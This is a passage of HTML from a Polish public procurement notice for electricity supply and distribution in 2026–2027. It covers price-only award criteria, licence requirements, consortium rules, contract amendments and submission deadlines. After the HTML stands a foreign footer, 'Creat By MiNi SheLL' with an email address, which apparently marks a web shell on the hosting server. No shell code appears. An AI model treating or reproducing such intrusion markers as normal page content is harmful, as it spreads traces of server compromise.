class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2027-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia, w każdej z części zamówienia oddzielnie, Wykonawcy(om),<br/>którego(ych) oferta(y) odpowiadać będzie(ą) wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie(ną)<br/>oceniona jako najkorzystniejsza(e) w oparciu zasady wskazane w pkt 2.<br/>Przy wyborze najkorzystniejszej oferty, w każdej z część zamówienia, Zamawiający będzie kierował się kryterium „cena oferty brutto”<br/>z wagą 100%, gdyż – zgodnie z przepisem art. 246 ust. 2 Ustawy – Zamawiający określił w opisie przedmiotu zamówienia<br/>wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. Liczba<br/>punktów przyznanych ofertom zostanie wyliczona – dla każdej części zamówienia oddzielnie – zgodnie z poniższym wzorem:<br/>K = (C min.)/(C of.bad.)×100 pkt<br/>gdzie:<br/>K – liczba punktów przyznanych ofercie badanej (liczona z dokładnością do trzech miejsc po przecinku), w danej części,<br/>C min.– najniższa cena oferty brutto spośród ofert nieodrzuconych, w danej części,<br/>C of. bad. –cena oferty brutto oferty badanej, w danej części.<br/>Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o<br/>takiej samej cenie, zastosowanie będą miały zapisy art. 249 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Ustawy, z zastrzeżeniem art. 110 ust. 2-3 Ustawy,<br/>2) nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. z 2024 r., poz. 507 ze zm.)<br/>oraz<br/>3) spełniają warunki udziału w postępowaniu na podstawie art. 114 Ustawy dotyczące posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualną koncesję na prowadzenie działalności gospodarczej w<br/>zakresie obrotu energią elektryczną, wydaną przez Prezesa Urzędu Regulacji Energetyki,<br/>b) Wykonawca spełni warunek jeżeli wykaże, że posiada aktualną koncesję na dystrybucję energii elektrycznej wydaną<br/>przez Prezesa Urzędu Regulacji Energetyki lub – jeżeli Wykonawca nie jest właścicielem sieci dystrybucyjnej – umowę zawartą z właściwym Operatorem Systemu Dystrybucyjnego (PGE Dystrybucja S.A.) umożliwiającą świadczenie usługi kompleksowej albo Oświadczenie o posiadaniu podpisanej umowy z OSD na świadczenie usług dystrybucji energii elektrycznej w zakresie dystrybucji energii elektrycznej (wg Załącznika nr 7 do Specyfikacji).<br/>UWAGA<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają świadczenia, do realizacji których te zdolności są wymagane. W takiej sytuacji, zgodnie z art. 117 ust. 4 Ustawy, Wykonawca składa wraz<br/>z ofertą oświadczenie w zakresie wskazania, które świadczenia wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji.<br/>2. Wykonawca jest zobowiązany wykazać niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w postępowaniu.<br/>3. Ocena spełniania w/w zostanie dokonana w oparciu o informacje zawarte w przedłożonych przez Wykonawcę oświadczeniach lub dokumentach wyszczególnionych w rozdziale VI Specyfikacji. Z treści załączonych dokumentów musi wynikać, że Wykonawca w/w warunki spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) aktualne na dzień<br/>składania ofert Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania (Załącznik nr 2 do Specyfikacji),<br/>Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia, za<br/>pośrednictwem Platformy Zakupowej, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych i dokumentów:<br/>na potwierdzenie braku podstawy wykluczenia o której mowa w art. 108 ust. 1 pkt 5) Ustawy – oświadczenia Wykonawcy o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r o ochronie konkurencji i konsumentów (t. j.<br/>Dz. U. z 2024 r., poz. 1616), z innym wykonawcą, który złożył odrębną ofertę w niniejszym postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w<br/>niniejszym postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi<br/>Załącznik nr 5 do Specyfikacji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>aktualne na dzień składania ofert Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik nr 3 do<br/>Specyfikacji),<br/>2) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania, które dostawy lub usługi<br/>wykonają poszczególni Wykonawcy (członkowie konsorcjum) – (Załącznik nr 4 do Specyfikacji),<br/>3) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy w szczególności w zakresie<br/>podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestrowym,<br/>4) Zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie<br/>będzie dysponował niezbędnymi zasobami, jeżeli Wykonawca powołuje się na zasoby innych podmiotów (Załącznik nr 6 do<br/>Specyfikacji),<br/>Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia, za<br/>pośrednictwem Platformy Zakupowej, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych i dokumentów:<br/>na potwierdzenie spełnienia warunków udziału w postępowaniu dotyczącym uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej:<br/>a) aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną, wydana przez Prezesa Urzędu Regulacji Energetyki, przy czym Zamawiający dopuści możliwość złożenia koncesji, której ważność upływa w trakcie realizacji umowy, z zastrzeżeniem, że nowo wydany dokument zostanie przedstawiony Zamawiającemu na 3 miesiące przed upływem ważności aktualnej koncesji,<br/>b) aktualnej koncesji na dystrybucję energii elektrycznej wydanej przez Prezesa Urzędu Regulacji Energetyki lub – jeżeli Wykonawca<br/>nie jest właścicielem sieci dystrybucyjnej – umowy zawartej z właściwym Operatorem Systemu Dystrybucyjnego (PGE Dystrybucja<br/>S.A.) umożliwiającej świadczenie usługi kompleksowej albo Oświadczenia o posiadaniu podpisanej umowy z OSD na świadczenie<br/>usług dystrybucji energii elektrycznej w zakresie dystrybucji energii elektrycznej (wg Załącznika nr 7 do Specyfikacji).<br/>UWAGA:<br/>W odniesieniu do uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, czyli warunku wskazanego w<br/>rozdziale IX ust. 1 pkt 3) Specyfikacji, warunek zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegający się o<br/>udzielenie zamówienia posiada uprawnienie do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje<br/>dostawy, do których realizacji te uprawnienia są wymagane.<br/>UWAGA:<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają dostawy/usługi, do<br/>realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania,<br/>które dostawy wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku:<br/>1) oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie,<br/>2) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi udokumentować, że nie podlega<br/>Ogłoszenie nr 2025/BZP 00165121/01 z dnia 2025-03-27<br/>2025-03-27 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>wykluczeniu z postępowania na podstawie przesłanek określonych w rozdziale VIII Specyfikacji, co oznacza, że każdy z<br/>Wykonawców składa oddzielnie oświadczenia stanowiące Załączniki nr 2 i 3 do Specyfikacji – zgodnie z art. 125 ust. 4<br/>Ustawy,<br/>3) muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – zgodnie z art. 58 ust. 2 Ustawy,<br/>4) przed podpisaniem umowy przedłożą pełnomocnictwo do zawarcia umowy w sprawie zamówienia publicznego, jeżeli<br/>pełnomocnictwo takie nie zostało dołączone do oferty.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają świadczenia,<br/>do realizacji których te zdolności są wymagane. W takiej sytuacji, zgodnie z art. 117 ust. 4 Ustawy, Wykonawca składa wraz<br/>z ofertą oświadczenie w zakresie wskazania, które świadczenia wykonają poszczególni Wykonawcy (członkowie<br/>konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz zmian dopuszczalnych Ustawą (art. 455 Ustawy) Zamawiający przewiduje zmiany określone poniżej:<br/>1) działanie siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami,<br/>2) zmiana sposobu realizacji przedmiotu Umowy wynikającej ze zmian w obowiązujących przepisach prawa mających<br/>wpływ na realizację przedmiotu Umowy,<br/>3) zmiany danych identyfikujących Strony Umowy,<br/>4) zmian mających na celu doprecyzowanie zapisów w treści Umowy, jeśli będą budziły wątpliwości interpretacyjne między<br/>Stronami,<br/>5) zmiany podwykonawcy,<br/>6) redakcyjne omyłki pisarskie.<br/>2. Ponadto Zamawiający przewiduje zmiany Umowy w zakresie zmiany wysokości wynagrodzenia Wykonawcy w<br/>przypadku:<br/>1) zmiany stawki podatku od towarów i usług, podatku akcyzowego i taryfy OSD,<br/>2) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na<br/>podstawie przepisów ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie o<br/>pracowniczych planach kapitałowych,<br/>gdy zmiany wskazane w ust. 2 ppkt 1) – 4) będą miały wpływ na ceny usług Wykonawcy. Wówczas zastosowanie będzie<br/>miała procedura opisana w ust. 3 – 5 niniejszego rozdziału,<br/>5) zmiany łącznego maksymalnego wynagrodzenia Wykonawcy.<br/>3. W przypadku zmiany, o której mowa w ust. 2. niniejszego rozdziału, Wykonawca przekaże Zamawiającemu propozycję<br/>wprowadzenia zmiany do Umowy z uzasadnieniem jej dokonania i wskazaniem wpływu zmiany powyższych czynników na<br/>wzrost kosztów wykonania przedmiotu Umowy, zawierającym w szczególności:<br/>1) sposób kalkulacji cen wskazanych w ofercie wraz z informacjami dotyczącymi sposobu ich obliczenia,<br/>2) wskazania podstawy prawnej stanowiącej podstawę poniesienia wyższych kosztów wykonania usługi,<br/>3) sposób kalkulacji cen proponowanych wraz z informacjami dotyczącymi sposobu ich obliczenia z uwzględnieniem<br/>wskazania kosztów wynikających z okoliczności, o których mowa w pkt 2). Sposób kalkulacji cen musi odpowiadać regułom<br/>przyjętym podczas kalkulacji, o której mowa w pkt 1).<br/>4. Strona zainteresowana zmianą Umowy prześle drugiej Stronie propozycję wprowadzenia zmiany zawierającą<br/>uzasadnienie jej dokonania.<br/>5. Strona, do której została skierowana propozycja wprowadzenia zmiany odniesie się do treści propozycji w terminie 7 dni<br/>od dnia otrzymania pisma, z zastrzeżeniem zmian, o których mowa w ust. 2. niniejszego rozdziału. W przypadku zmiany, o<br/>której mowa w ust. 2. niniejszego rozdziału, Zamawiający odniesie się do propozycji wprowadzenia zmiany w terminie 21 dni<br/>od dnia otrzymania pisma wraz z wymaganymi dokumentami.<br/>6. Zmiana w zakresie wysokości wynagrodzenia, o której mowa w ust. 2. niniejszego rozdziału nie przekroczy kwoty<br/>wynikającej ze zmian przepisów prawa, stanowiących podstawę wprowadzenia zmiany i będzie obowiązywać od dnia<br/>wejścia w życie zmienionych przepisów.<br/>7. Wszelkie zmiany Umowy dla swej ważności wymagają formy pisemnej pod rygorem nieważności, z wyjątkiem:<br/>1) zmiany stawki podatku od towarów i usług, podatku akcyzowego lub zmiany taryfy OSD, chyba że zmiana ta<br/>prowadziłaby do zwiększenia łącznego maksymalnego wynagrodzenia Wykonawcy z tytułu wykonania całości przedmiotu<br/>Umowy, o którym mowa w rozdziale I ust. 1 projektowanych postanowień umowy, przy czym kontrola stanu wykorzystania<br/>kwoty łącznego maksymalnego wynagrodzenia Wykonawcy leży po stronie Zamawiającego.<br/>2) zmiany podwykonawcy,<br/>3) przedkładania zmian koncesji oraz niezwłocznego zawiadomienia Zamawiającego o jej utracie,<br/>4) niezwłocznego zawiadomienia Zamawiającego o zakończeniu umowy pomiędzy OSD a Wykonawcą oraz przedkładania<br/>kolejnej umowy pomiędzy OSD a Wykonawcą,<br/>5) powiadamiania o zmianach adresów korespondencyjnych i adresów poczty elektronicznej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-22 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com